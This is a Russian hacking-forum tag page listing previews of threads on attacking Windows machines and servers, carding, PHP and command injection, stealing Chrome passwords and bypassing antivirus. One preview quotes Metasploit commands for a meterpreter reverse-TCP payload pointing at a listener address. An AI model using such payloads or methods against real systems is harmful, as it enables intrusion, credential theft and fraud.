• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

хак

  1. B

    Проблема скомпрометировать windows 7, за 3 минуты

    Всем доброго времени суток! описание ситуации: 1)стоит машина под управлением windows 7 2)обновленный Касперский под паролем 3)пароль администратора стоит 4)разрешение на запуск exe есть 5)есть меньше 3 минут на манипуляции 6)есть флешка, которую можно применить Сам вопрос: какие возможные...
  2. PingVinich

    Готовимся к кибер-войне. Часть II (Удалённые атаки на сервера)

    Все части. ВНИМАНИЕ: Всё что описано в этой статье попадает под УК РФ. Данная статья не призывает к нарушению УК РФ, а предоставляет информацию для общего развития. Привет! Сегодня я расскажу как проводятся удалённые кибератаки на сервера. Ярым старичкам в этом деле эта статья не принесёт...
  3. PingVinich

    Немного о кардинге

    Привет. Сегодня я расскажу о том, что такое кардинг. Как говорит википедия, Хотя данное определение довольно точно выражает суть, я бы хотел рассказать вам немного глубже о данной деятельности. ВНИМАНИЕ! Настоятельно не рекомендуется использовать методы которые описываются в этой статье. Эта...
  4. PingVinich

    Статья Code Injection или как внедрить свой php код на сайт.

    И снова привет! Сегодня мы поговорим о таком типе атак, как Code Injection. Code Inejction - это общий термин для типов атак который состоит из инъекционного кода, который затем интерпретируется/ исполняется приложением. Данная атака чаще всего применима при плохой обработке ненадёжных данных в...
  5. PingVinich

    PHP Include - это просто!

    Привет! Сегодня я расскажу о такой атаке, как PHP Include. PHP Include - это атака, которая заключается во внедрении сурогатной страницы в уязвимое веб-приложение. Давайте рассмотрим всё на примере. Допустим что существует веб-приложение, которое принимает аргумент page через GET запрос, вот...
  6. PingVinich

    Статья Гайд по Command Injection

    Привет! Сегодня я расскажу об очень опасной уязвимости Command Injection. Командная инъекция - это атака, где целью является выполнение произвольных команд в операционной системе сервера через уязвимое приложение. Атаки с помощью командной инъекции возможны, когда веб-приложение принимает...
  7. SooLFaa

    Статья Воруем пароли из Google Chrome

    Ave Caesars, morituri te salutant! И снова здрасте. Почему я вспомнил Цезаря? Потому что как гладиаторы, что бились во имя его, мы сегодня пойдем в борьбу за пароли гугл хрома во славу Хека. Как и в любой моей статье будет личный профит и разработка. Ну обо всем по порядку…….. Итак, что мы...
  8. SooLFaa

    Имитация взлома или как обманывают хекеры вконтакте

    Вечер в хату, Арестанты. Приветствую вас господа. Попросил меня мой хороший товарищ, значится, написать такую программулину, которая будет менять вёрстку в браузере на лету, дабы похвастаться перед друзьями сколько много у него денег на счету или обмануть каких - нибудь людей "взломом вк"...
  9. SooLFaa

    Статья AV ByPass с помощью C#

    Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#. Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите. use windows/meterpreter/reverse_tcp Устанавливаем опции set LHOST 192.168.1.237 set LPORT 1338 set EXITFUNC thread И...
Вверх Снизу